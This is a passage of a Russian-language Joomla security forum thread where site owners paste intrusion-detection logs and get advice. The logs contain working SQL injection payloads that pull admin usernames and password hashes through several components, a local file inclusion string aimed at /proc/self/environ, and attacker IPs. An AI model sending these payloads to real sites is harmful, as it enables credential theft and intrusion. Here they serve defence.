Компоненты и скрипты для защиты сайта. Логи атак на сайты - страница 6 - Безопасность сайтов на Joomla

Вариант один. Вычистить все и обновится до последних версий расширений и Joomla. Поменять пароли.

Вариант один. Вычистить все и обновится до последних версий расширений и Joomla. Поменять пароли.

И не забывать систематически бэкапы делать!

Биржи ссылок и доров тоже вроде нету.
Пароли поменял, поставил двойную авторизацию в админку.
Вспомнил, что в это время пришло три письма от плагина Marcos interceptor, уже видимо после того как были залиты левые файлы. Там была попытка взлома двух компонентов, которых у меня нету и одна инъекция в ком.контент.
Тогда был не возле компа - не мог детально проверить сайты.

По JCE вопрос - в последних версиях уязвимостей нету? Или каким вы пользуетесь редактором?

Биржи ссылок и доров тоже вроде нету.
Пароли поменял, поставил двойную авторизацию в админку.
Вспомнил, что в это время пришло три письма от плагина Marcos interceptor, уже видимо после того как были залиты левые файлы. Там была попытка взлома двух компонентов, которых у меня нету и одна инъекция в ком.контент.
Тогда был не возле компа - не мог детально проверить сайты.

По JCE вопрос - в последних версиях уязвимостей нету? Или каким вы пользуетесь редактором?

в последних версиях, в паблике нету! а что с другии компонентами? чистые? не плохой маневр был бы если на ошибки прописать функцию которая вела бы логи на староннем сервере и по мере необходимости выссылала отчет на почту раз в неделю для профилактики)

Из других компонентов:
1-ый сайт: sh404sef(последняя для 1.5), фока галлерея(последняя), акеба бекап. Модулей левых нету
2-ой сайт: sh404SEF, VirtueMart, jrecash, acymailing, JCE редактор, акеба бекап.

По поводу прописать функцию - сколько это будет стоить? Куда отсылать логи будет, вам? И в  чем преимущество, плагин марко тоже сразу высылает отчет?

VirtueMart, JCE какой версии?

Из других компонентов:
1-ый сайт: sh404sef(последняя для 1.5), фока галлерея(последняя), акеба бекап. Модулей левых нету
2-ой сайт: sh404SEF, VirtueMart, jrecash, acymailing, JCE редактор, акеба бекап.

По поводу прописать функцию - сколько это будет стоить? Куда отсылать логи будет, вам? И в  чем преимущество, плагин марко тоже сразу высылает отчет?

На счет плагина марко не знаю, в компонентах фотоголерей знаю что есть скули, также и в VirtueMart, об остальных не знаю, если любопытство глумит то надо аналезировать код! на счет логов, куда угодно... на вашь сервер, вам в почту еще куда либо)

VirtueMart, JCE какой версии?

VirtueMart 1.1.14, JCE последняя версия с оффсайта, еще плагин - core design captcha plugin, PhocaGallery тоже последняя с оффсайта.
VirtueMart старенький, но там полезных хаков по магазину много, если обновлять слетит все к чертям.

VirtueMart 1.1.14, JCE последняя версия с оффсайта, еще плагин - core design captcha plugin, PhocaGallery тоже последняя с оффсайта.
VirtueMart старенький, но там полезных хаков по магазину много, если обновлять слетит все к чертям.

VirtueMart 1.1.14, JCE последняя версия с оффсайта, еще плагин - core design captcha plugin, PhocaGallery тоже последняя с оффсайта.
VirtueMart старенький, но там полезных хаков по магазину много, если обновлять слетит все к чертям.

Не обезательно обновлять компонент, можно просто в коде закрыть дыры!

Marco прислал информацию - пытались сегодня вскрыть сайт на Joomla 1.5:

** Union Select [GET:tag] => 999999.9\' union all select 1,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e) from jos_users-- a** Table name in url [GET:tag] => 999999.9\' -- 1,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e) from jos_users-- a** Union Select [REQUEST:tag] => 999999.9\' union all select 1,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e) from jos_users-- a** Table name in url [REQUEST:tag] => 999999.9\' -- 1,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e) from jos_users-- a**PAGE / SERVER INFO*REMOTE_ADDR :46.37.166.22*HTTP_USER_AGENT :Mozilla/5.0*REQUEST_METHOD :GET*QUERY_STRING :option=com_tag&task=tag&lang=es&tag=999999.9'+union+all+select+1,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e)+from+jos_users--+a** SUPERGLOBALS DUMP (sanitized)*$_GET DUMP -[option] => com_tag -[task] => tag -[lang] => es -[tag] => 999999.9\' -- 1,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e) from -- users-- a*$_POST DUMP*$_COOKIE DUMP*$_REQUEST DUMP -[option] => com_tag -[task] => tag -[lang] => es -[tag] => 999999.9\' -- 1,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e) from -- users-- a

Это ботнет, стучал и к  клиентам сегодня. Если у вас нет этого расширения то боятся нечего.

Это старая уязвимость, но на сегодняшние день очень акктуальна для необнавленных компонентов.

Логи Marcos

** Local File Inclusion [GET:controller] => ../../../../../../../../../../../../../../../../../../../../../../../..//proc/self/environ 00
** Local File Inclusion [REQUEST:controller] => ../../../../../../../../../../../../../../../../../../../../../../../..//proc/self/environ 00

**PAGE / SERVER INFO


*REMOTE_ADDR :
216.70.90.155

*HTTP_USER_AGENT :
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6

*REQUEST_METHOD :
GET

*QUERY_STRING :
option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../../../../../../../../../..//proc/self/environ%0000



** SUPERGLOBALS DUMP (sanitized)


*$_GET DUMP
 -[option] => com_ccnewsletter
 -[controller] => ../../../../../../../../../../../../../../../../../../../../../../../..//proc/self/environ 00


*$_POST DUMP


*$_COOKIE DUMP


*$_REQUEST DUMP
 -[option] => com_ccnewsletter
 -[controller] => ../../../../../../../../../../../../../../../../../../../../../../../..//proc/self/environ 00

Тоже уязвимость от 2010 года. Обновляйте сайты, чтобы такие приколы не проходили. 100% этого компонента у вас нет.

Да, этого компонента у меня нету.)

Вчера первый раз пришло письмо Marco's interceptor warning, из него мне мало что понятно, поэтому поначитавшись тут ужастиков решил уточнить у спецов, не опасноли это и что это вообще и какие меры предпринимать?

** Union Select [GET:tag] => 999999.9' union all select 1,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e) from jos_users-- a
** Table name in url [GET:tag] => 999999.9' -- 1,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e) from jos_users-- a
** Union Select [REQUEST:tag] => 999999.9' union all select 1,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e) from jos_users-- a
** Table name in url [REQUEST:tag] => 999999.9' -- 1,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e) from jos_users-- a

**PAGE / SERVER INFO


*REMOTE_ADDR :
46.37.166.22

*HTTP_USER_AGENT :
Mozilla/5.0

*REQUEST_METHOD :
GET

*QUERY_STRING :
option=com_tag&task=tag&lang=es&tag=999999.9'+union+all+select+1,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e)+from+jos_users--+a



** SUPERGLOBALS DUMP (sanitized)


*$_GET DUMP
 -[option] => com_tag
 -[task] => tag
 -[lang] => es
 -[tag] => 999999.9' -- 1,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e) from -- users-- a


*$_POST DUMP


*$_COOKIE DUMP


*$_REQUEST DUMP
 -[option] => com_tag
 -[task] => tag
 -[lang] => es
 -[tag] => 999999.9' -- 1,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e) from -- users-- a

com_tag у вас есть? пытаются взломать вас через него SQL-инъекцией нехорошие люди.

com_tag у вас есть? пытаются взломать вас через него SQL-инъекцией нехорошие люди.

такого com_tag у меня нет

люди добрые, почитав данную тему, про хулиганов с SQL-шприцами я уже понял, хотелось бы поподробнее...

привет.
сегодня у себя в Перенаправлениях заметил ссылку:

jos_users - понятно, а что все остальное значит?

такого com_tag у меня нет

Тогда не о чем беспокоиться.

jos_users - понятно, а что все остальное значит?

Ерунда, если com_tag нет. Не обращайте внимания.

Это пока ерунда.
Подозреваю в этих нехороших действиях одного необразованного клоуна.
Ранее он пытался получить доступ к моей админке решив что сайт у меня на WP.
Вот список его попыток:
wp-admin
wp-login.php
wp-trackback.php
bitrix/admin/index.php?lang=en
admin/login.php
blog/wp-trackback.php 

привет.
сегодня у себя в Перенаправлениях заметил ссылку:

Спойлер

[свернуть]

jos_users - понятно, а что все остальное значит?

А все остальное, это запрос к вашей MySQL db, в результате которой взломщику место вашего контента на сайте вывидется логин и пароль от админки!

Это пока ерунда.
Подозреваю в этих нехороших действиях одного необразованного клоуна.
Ранее он пытался получить доступ к моей админке решив что сайт у меня на WP.
Вот список его попыток:
wp-admin
wp-login.php
wp-trackback.php
bitrix/admin/index.php?lang=en
admin/login.php
blog/wp-trackback.php 

Да))) там походу действительно не образованный клоун был))

Сегодня этот же, но уже Kunena опрашивается...

Ниже попытка взлома Поиска. Насколько это страшно?

Сегодня сразу две атаки:

** Union Select [GET:search] => \' and 1=2) union select 1,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e),3,4,5,6,7,8,9,10,11,12,13,14,15 from jos_users-- ;
** Table name in url [GET:search] => \' and 1=2) -- 1,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e),3,4,5,6,7,8,9,10,11,12,13,14,15 from jos_users-- ;
** Union Select [REQUEST:search] => \' and 1=2) union select 1,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e),3,4,5,6,7,8,9,10,11,12,13,14,15 from jos_users-- ;
** Table name in url [REQUEST:search] => \' and 1=2) -- 1,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e),3,4,5,6,7,8,9,10,11,12,13,14,15 from jos_users-- ;

**PAGE / SERVER INFO


*REMOTE_ADDR :
46.37.166.22

*HTTP_USER_AGENT :
Mozilla/5.0

*REQUEST_METHOD :
GET

*QUERY_STRING :
option=com_kunena&func=userlist&search='+and+1=2)+union+select+1,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e),3,4,5,6,7,8,9,10,11,12,13,14,15+from+jos_users--+;



** SUPERGLOBALS DUMP (sanitized)


*$_GET DUMP
 -[option] => com_kunena
 -[func] => userlist
 -[search] => \' and 1=2) -- 1,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e),3,4,5,6,7,8,9,10,11,12,13,14,15 from -- users-- ;


*$_POST DUMP


*$_COOKIE DUMP


*$_REQUEST DUMP
 -[option] => com_kunena
 -[func] => userlist
 -[search] => \' and 1=2) -- 1,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e),3,4,5,6,7,8,9,10,11,12,13,14,15 from -- users-- ;


И еще одна:

** Union Select [GET:gallery] => -1 union select 1,2,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e),4,5,6,7,8,9,10 from jos_users--
** Table name in url [GET:gallery] => -1 -- 1,2,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e),4,5,6,7,8,9,10 from jos_users--
** Union Select [REQUEST:gallery] => -1 union select 1,2,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e),4,5,6,7,8,9,10 from jos_users--
** Table name in url [REQUEST:gallery] => -1 -- 1,2,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e),4,5,6,7,8,9,10 from jos_users--

**PAGE / SERVER INFO


*REMOTE_ADDR :
46.37.166.22

*HTTP_USER_AGENT :
Mozilla/5.0

*REQUEST_METHOD :
GET

*QUERY_STRING :
option=com_ignitegallery&task=view&gallery=-1+union+select+1,2,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e),4,5,6,7,8,9,10+from+jos_users--



** SUPERGLOBALS DUMP (sanitized)


*$_GET DUMP
 -[option] => com_ignitegallery
 -[task] => view
 -[gallery] => -1 -- 1,2,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e),4,5,6,7,8,9,10 from -- users--


*$_POST DUMP


*$_COOKIE DUMP


*$_REQUEST DUMP
 -[option] => com_ignitegallery
 -[task] => view
 -[gallery] => -1 -- 1,2,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e),4,5,6,7,8,9,10 from -- users--

Прокомментируйте, пожалуйста! Спасибо!

у меня тоже сегодня в 9.07
** Union Select [GET:search] => ' and 1=2) union select 1,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e),3,4,5,6,7,8,9,10,11,12,13,14,15 from jos_users-- ;
** Table name in url [GET:search] => ' and 1=2) union select 1,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e),3,4,5,6,7,8,9,10,11,12,13,14,15 from jos_users-- ;
** Union Select [REQUEST:search] => ' and 1=2) union select 1,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e),3,4,5,6,7,8,9,10,11,12,13,14,15 from jos_users-- ;
** Table name in url [REQUEST:search] => ' and 1=2) union select 1,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e),3,4,5,6,7,8,9,10,11,12,13,14,15 from jos_users-- ;

**PAGE / SERVER INFO


*REMOTE_ADDR :
46.37.166.22

*HTTP_USER_AGENT :
Mozilla/5.0

*REQUEST_METHOD :
GET

*QUERY_STRING :
option=com_kunena&func=userlist&search='+and+1=2)+union+select+1,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e),3,4,5,6,7,8,9,10,11,12,13,14,15+from+jos_users--+;



** SUPERGLOBALS DUMP (sanitized)


*$_GET DUMP
 -[option] => com_kunena
 -[func] => userlist
 -[search] => ' and 1=2) union select 1,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e),3,4,5,6,7,8,9,10,11,12,13,14,15 from jos_users-- ;


*$_POST DUMP


*$_COOKIE DUMP


*$_REQUEST DUMP
 -[option] => com_kunena
 -[func] => userlist
 -[search] => ' and 1=2) union select 1,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e),3,4,5,6,7,8,9,10,11,12,13,14,15 from jos_users-- ;

И на этот раз com_kunena  у меня есть

У ботов весна... Kunena обновить надо до 2.0.4 если старая стоит.